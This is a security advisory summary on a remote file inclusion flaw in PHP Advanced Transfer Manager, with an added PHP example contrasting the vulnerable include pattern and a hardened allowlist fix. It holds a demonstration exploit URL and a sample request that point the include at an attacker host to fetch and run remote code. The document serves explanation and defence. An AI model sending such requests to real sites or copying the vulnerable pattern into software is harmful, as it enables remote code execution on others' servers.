Hole in Advanced Transfer Manager
http://www.securitytracker.com/alert...y/1014008.html
An include file vulnerability was reported in PHP Advanced Transfer Manager. A remote user can execute arbitrary commands on the target system.
If allow_url_fopen is set to 'on' in the 'php.ini' configuration file, the 'include/common.php' script lets a remote user set the 'include_location' variable from the request. The script uses that value as the base of a path passed to include() without validating it, so a request that points it at a web server the attacker controls makes PHP fetch the remote file over HTTP and execute it (a classic remote file inclusion).
Any PHP in that file, including calls that run operating system commands, executes with the privileges of the target web service account. Note for anyone reproducing this on a current stack: since PHP 5.2, include() of a URL additionally requires allow_url_include=On, which defaults to Off, so allow_url_fopen alone no longer suffices on those versions; the application-level fix is the same either way: do not build include paths from request data.
A demonstration exploit URL is provided:
http://[target]/index.php?include_location=http://[attacker]/
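The following is an added illustration of the bug class described above, not code from PHP Advanced Transfer Manager or from the SecurityTracker advisory. It assumes a script that builds its include path from a request-controlled 'include_location' value (the vulnerable pattern) and shows a hardened replacement beside it; the directory name, file list and attacker host are placeholders, not the project's identifiers.

```php
<?php
// Added example modelling the remote file inclusion described in the advisory.
// Assumptions: include_location is taken from the request, and the script
// appends a file name to it before calling include(). Not project code.

// --- Vulnerable pattern (the "before") --------------------------------------
// With register_globals=On (PHP < 5.4) a request parameter named
// include_location silently becomes $include_location; the explicit $_GET
// style fallback below reproduces the same mistake on any PHP version.
function vulnerable_include_path(array $request)
{
    $include_location = isset($request['include_location'])
        ? $request['include_location']
        : './include/';
    // With allow_url_fopen=On (and, on PHP >= 5.2, allow_url_include=On),
    // ?include_location=http://attacker.example/ makes include() fetch and run
    // http://attacker.example/common.php as the web server user.
    return $include_location . 'common.php';   // value that would reach include()
}

// --- Hardened pattern --------------------------------------------------------
// 1. The include directory is a constant, never derived from the request.
define('ATM_INCLUDE_DIR', __DIR__ . '/include/');

function safe_include_path($name)
{
    // 2. Only known module names map to files; anything else is refused.
    static $allowed = array('common' => 'common.php', 'lang' => 'lang.php');
    if (!isset($allowed[$name])) {
        return null;
    }
    $base = realpath(ATM_INCLUDE_DIR);
    $path = realpath(ATM_INCLUDE_DIR . $allowed[$name]);
    if ($base === false || $path === false) {
        return null;                       // directory or file does not exist
    }
    // 3. Confirm the resolved path still lies inside the include directory
    //    (guards against symlinks and any future path concatenation).
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;                          // safe to pass to include()
}

// Demonstration with a constructed request mirroring the advisory's URL.
$attack = array('include_location' => 'http://attacker.example/');
echo "vulnerable: ", vulnerable_include_path($attack), "\n";
// prints: vulnerable: http://attacker.example/common.php

var_dump(safe_include_path('common'));                   // absolute path, or NULL if ./include/common.php is absent
var_dump(safe_include_path('http://attacker.example/')); // NULL: not an allowed module name
```

The hardened version removes the attacker's control at the source rather than relying on php.ini: even on a host where allow_url_fopen and allow_url_include are both On, include() only ever receives a path from a fixed list under a fixed directory. Setting allow_url_include=Off (and allow_url_fopen=Off where nothing needs it) is still worth doing as defence in depth.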